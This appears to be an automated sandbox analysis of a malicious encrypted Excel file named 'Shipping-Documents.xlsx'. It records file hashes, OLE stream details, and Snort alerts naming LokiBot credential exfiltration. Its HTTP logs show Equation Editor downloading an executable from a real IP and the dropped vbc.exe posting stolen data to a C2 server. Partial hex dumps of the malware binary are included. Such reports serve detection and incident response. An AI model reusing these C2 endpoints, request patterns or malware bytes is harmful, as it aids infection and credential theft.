                            SSDEEP:3:/lbWwWvllbWwWvllbWwWvllbWwWvllbWwWvllbWwWvllbWwWl:seeeeeeZ
                            MD5:E34D74806A224083D4011C3BED51D210
                            SHA1:5F801AC445BAB225AD54C6875B1CAA13DC64BAD8
                            SHA-256:36B1C45B1C4DF82A82C9F6E40AE8746549ECF0957E92FD968516ECD4BA57C45F
                            SHA-512:E88FF1C1159BA47052C5889A9CCC1F0385877515E66695D91F8FD7541007D643E031B22AA18B429B303A271E848DBD74017625666A1D303C04544D01B8C975D3
                            Malicious:false
                            Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.
                            C:\Users\user\Desktop\~$Shipping-Documents.xlsx
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):330
                            Entropy (8bit):1.4377382811115937
                            Encrypted:false
                            SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                            MD5:96114D75E30EBD26B572C1FC83D1D02E
                            SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                            SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                            SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                            Malicious:true
                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            C:\Users\Public\vbc.exe
                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):761856
                            Entropy (8bit):7.601403838460658
                            Encrypted:false
                            SSDEEP:12288:88zqLMOeSMxvquwaHpCwQqc6n2R8Uncvc6t8TSx+f5SSruwsr4Z4:zOgfquPHpCwQqRTTt88KSKNsrJ
                            MD5:7146B0D2CAED6422C289A08F63A5C685
                            SHA1:2666D058EA4E4A2CA5BC6E5EA75594E68FC63F1B
                            SHA-256:25AA6393CACFF94544387CC515F754DFD2AF133612A74FD84B64C6E17354D1ED
                            SHA-512:F0B3098F20A22095397AB88348ECFE0911B126739005C9B70A815543BE04465603D3ED0C070BA50488C88FE13B9470D003C114254941593BA20F4511CB01CC47
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 11%
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.`................................ ........@.. ....................................@.....................................K.......,...........................?................................................ ............... ..H............text....... ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........&..h...........P,.............................................j+.&.(....(....(.....o....*..0..........+.&.+.&. .....9S...&..(....8....& ....8;.....(.... ....8*.....(.... ....8......(....8.... ............E................................/... ....(....:....&..(.....(....9s...& .....9....&*.V+.&..(....(....(....*..V+.&..(....o#...(....*...+.&..*..+.&..*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*..+.&..(....*:+.&.....o!...*.J+.&....

                            Static File Info

                            General

                            File type:CDFV2 Encrypted
                            Entropy (8bit):7.995662263943651
                            TrID:
                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                            File name:Shipping-Documents.xlsx
                            File size:1359872
                            MD5:20e540ed9d02f60f7fb928ed8fe60f1f
                            SHA1:afa6c289fbeed004fe3a52c666cf32a8ae444e79
                            SHA256:3c48a312d69b2d72bec8b3dad17e99ee1241afff875e97b73569509d5f8b07ec
                            SHA512:1f1aed88494f999628457d75b3f1097bd1b05c48610ce09c96e827a34c1f81f8ef40a46027404cc050545258dfc290fd024923a73bd880019d95bbec27035fb5
                            SSDEEP:24576:dHM2lbcLvEgwCf3okSoDsM0J+MC0MhXWc3zfSl2dz5QEYLiHjlkIh5cM07ZP:d2Lcgws3eooMQ+zNhGaza85Jlk018x
                            File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                            File Icon

                            Icon Hash:e4e2aa8aa4b4bcb4

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "Shipping-Documents.xlsx"

                            Indicators

                            Has Summary Info:False
                            Application Name:unknown
                            Encrypted Document:True
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:False
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:
                            Flash Objects Count:
                            Contains VBA Macros:False

                            Streams

                            Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                            General
                            Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                            File Type:data
                            Stream Size:64
                            Entropy:2.73637206947
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                            Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                            Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                            General
                            Stream Path:\x6DataSpaces/DataSpaceMap
                            File Type:data
                            Stream Size:112
                            Entropy:2.7597816111
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                            Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                            Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                            General
                            Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                            File Type:data
                            Stream Size:200
                            Entropy:3.13335930328
                            Base64 Encoded:False
                            Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                            Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                            General
                            Stream Path:\x6DataSpaces/Version
                            File Type:data
                            Stream Size:76
                            Entropy:2.79079600998
                            Base64 Encoded:False
                            Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                            Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                            Stream Path: EncryptedPackage, File Type: data, Stream Size: 1345224
                            General
                            Stream Path:EncryptedPackage
                            File Type:data
                            Stream Size:1345224
                            Entropy:7.99980515236
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . O . . ; . v i . . . . Z . & R . _ ; . . . . ! . . . ! . . . . . . . f m . x . . . . . . . . . q . : . A . ^ $ . h . . ( . . > . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ .
                            Data Raw:b7 86 14 00 00 00 00 00 4f bf fc 3b 1b 76 69 fe a8 9b 7f 5a 9f 26 52 fe 5f 3b fd d2 b5 8d 21 a5 c4 da 21 f9 ac c6 ff e5 fd f0 66 6d 87 78 8a d9 8a d9 0e e5 f7 81 a9 71 cb 3a cb 41 f5 5e 24 85 68 ee c6 28 8a fa 3e 02 80 fd 4f 18 51 6f 40 94 26 b4 fc c0 20 18 a2 d3 80 fd 4f 18 51 6f 40 94 26 b4 fc c0 20 18 a2 d3 80 fd 4f 18 51 6f 40 94 26 b4 fc c0 20 18 a2 d3 80 fd 4f 18 51 6f 40 94
                            Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                            General
                            Stream Path:EncryptionInfo
                            File Type:data
                            Stream Size:224
                            Entropy:4.56563786614
                            Base64 Encoded:False
                            Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . c . . . . . & . . 2 B e . . . 2 . . k . 0 . . . l O . w . x . . . . . . 0 . u D . . . k . . 7 . . . - X . T . . < . . . . . . . c . . [
                            Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            06/16/21-12:29:47.751148TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916880192.168.2.2263.141.228.141
                            06/16/21-12:29:47.751148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916880192.168.2.2263.141.228.141
                            06/16/21-12:29:47.751148TCP2025381ET TROJAN LokiBot Checkin4916880192.168.2.2263.141.228.141
                            06/16/21-12:29:47.751148TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916880192.168.2.2263.141.228.141
                            06/16/21-12:29:48.840134TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916980192.168.2.2263.141.228.141
                            06/16/21-12:29:48.840134TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916980192.168.2.2263.141.228.141
                            06/16/21-12:29:48.840134TCP2025381ET TROJAN LokiBot Checkin4916980192.168.2.2263.141.228.141
                            06/16/21-12:29:48.840134TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916980192.168.2.2263.141.228.141
                            06/16/21-12:29:49.987019TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917080192.168.2.2263.141.228.141
                            06/16/21-12:29:49.987019TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917080192.168.2.2263.141.228.141
                            06/16/21-12:29:49.987019TCP2025381ET TROJAN LokiBot Checkin4917080192.168.2.2263.141.228.141
                            06/16/21-12:29:49.987019TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917080192.168.2.2263.141.228.141
                            06/16/21-12:29:51.153026TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917180192.168.2.2263.141.228.141
                            06/16/21-12:29:51.153026TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917180192.168.2.2263.141.228.141
                            06/16/21-12:29:51.153026TCP2025381ET TROJAN LokiBot Checkin4917180192.168.2.2263.141.228.141
                            06/16/21-12:29:51.153026TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917180192.168.2.2263.141.228.141

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jun 16, 2021 12:29:38.771471977 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.016647100 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.016779900 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.017275095 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.263397932 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.263458967 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.263478041 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.263520002 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.263636112 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.263788939 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.508369923 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.508416891 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.508446932 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.508479118 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.508508921 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.508539915 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.508569002 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.508569002 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.508589983 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.508593082 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.508594990 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.508605957 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.508641005 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.753947973 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.754000902 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.754154921 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.754188061 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.754226923 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.754271030 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.754308939 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.754405975 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.754440069 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.754513025 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.754549980 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.754681110 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.754717112 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.754734039 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.754769087 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.754874945 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.754921913 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.754954100 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.754998922 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.755079985 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.755127907 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.755218029 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.755264997 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.755294085 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.755332947 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.755394936 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.755429983 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.755485058 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.755520105 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.755530119 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.755553007 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.758675098 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.998930931 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.998970032 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999012947 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999043941 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999056101 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999069929 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999088049 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999090910 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999105930 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999106884 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999149084 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999155998 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999187946 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999197960 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999221087 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999221087 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999253035 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999262094 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999284029 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999286890 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999313116 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999334097 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999346972 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999349117 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999377012 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999386072 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999408007 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999413013 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999444008 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999449015 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999469042 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999486923 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999501944 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999516010 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999532938 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999568939 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999573946 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999587059 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999617100 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999622107 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999650955 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999650955 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999682903 CEST8049167103.89.90.94192.168.2.22
                            Jun 16, 2021 12:29:39.999686956 CEST4916780192.168.2.22103.89.90.94
                            Jun 16, 2021 12:29:39.999715090 CEST8049167103.89.90.94192.168.2.22

                            HTTP Request Dependency Graph

                            • 103.89.90.94
                            • 63.141.228.141

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.2249167103.89.90.9480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            TimestampkBytes transferredDirectionData
                            Jun 16, 2021 12:29:39.017275095 CEST0OUTGET /pzldoc/regasm.exe HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                            Host: 103.89.90.94
                            Connection: Keep-Alive
                            Jun 16, 2021 12:29:39.263397932 CEST1INHTTP/1.1 200 OK
                            Date: Wed, 16 Jun 2021 10:29:38 GMT
                            Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                            Last-Modified: Wed, 16 Jun 2021 00:49:42 GMT
                            ETag: "ba000-5c4d77753dec3"
                            Accept-Ranges: bytes
                            Content-Length: 761856
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: application/x-msdownload
                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 4a c9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 94 0b 00 00 0a 00 00 00 00 00 00 de b2 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 b2 0b 00 4b 00 00 00 00 c0 0b 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0b 00 0c 00 00 00 3f b2 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 92 0b 00 00 20 00 00 00 94 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 06 00 00 00 c0 0b 00 00 08 00 00 00 96 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0b 00 00 02 00 00 00 9e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b2 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 26 01 00 68 05 01 00 03 00 00 00 01 00 00 06 50 2c 02 00 ef 85 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 2b 02 26 16 28 0e 00 00 0a 28 0f 00 00 0a 28 13 00 00 06 02 6f 10 00 00 0a 2a 00 13 30 03 00 bb 00 00 00 01 00 00 11 2b 02 26 16 2b 02 26 16 20 03 00 00 00 16 39 53 00 00 00 26 02 16 28 11 00 00 0a 38 0b 00 00 00 26 20 01 00 00 00 38 3b 00 00 00 02 16 28 0a 00 00 06 20 07 00 00 00 38 2a 00 00 00 02 16 28 07 00 00 06 20 06 00 00 00 38 19 00 00 00 02 16 28 09 00 00 06 38 bb ff ff ff 20 03 00 00 00 fe 0e 00 00 fe 0c 00 00 45 08 00 00 00 c2 ff ff ff a0 ff ff ff c2 ff ff ff b1 ff ff ff 90 ff ff ff 89 ff ff ff 10 00 00 00 2f 00 00 00 20 05 00 00 00 28 05 00 00 06 3a cc ff ff ff 26 02 16 28 08 00 00 06 16 28 05 00 00 06 39 73 ff ff ff 26 20 00 00 00 00 16 39 ad ff ff ff 26 2a 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0c 00 00 06 28 0d 00 00 06 2a 00 00 56 2b 02 26 16 02 28 0b 00 00 06 6f 23 00 00 06 28 0e 00 00 06 2a 00 00 1a 2b 02 26 16 17 2a 00 1a 2b 02 26 16 16 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 12 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 13 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 14 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 15 00 00 0a 2a 00 2e 2b 02 26 16 00 28 15 00 00 06 2a 3a 2b 02 26 16 fe 09 00 00 6f 21 00 00 06 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 16 00
                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJ` @ @K,? H.text `.rsrc,@@.reloc@BH&hP,j+&(((o*0+&+& 9S&(8& 8;( 8*( 8(8 E/ (:&((9s& 9&*V+&(((*V+&(o#(*+&*+&*J+&(*J+&(*J+&(*J+&(*.+&(*:+&o!*J+&(


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.224916863.141.228.14180C:\Users\Public\vbc.exe
                            TimestampkBytes transferredDirectionData
                            Jun 16, 2021 12:29:47.751147985 CEST807OUTPOST /32.php/S4wFP8QBww9Tp HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 63.141.228.141
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: B78A3212
                            Content-Length: 176
                            Connection: close
                            Jun 16, 2021 12:29:48.545754910 CEST808INHTTP/1.1 404 Not Found
                            Date: Wed, 16 Jun 2021 10:29:47 GMT
                            Server: Apache
                            Connection: close
                            Content-Type: text/html; charset=UTF-8
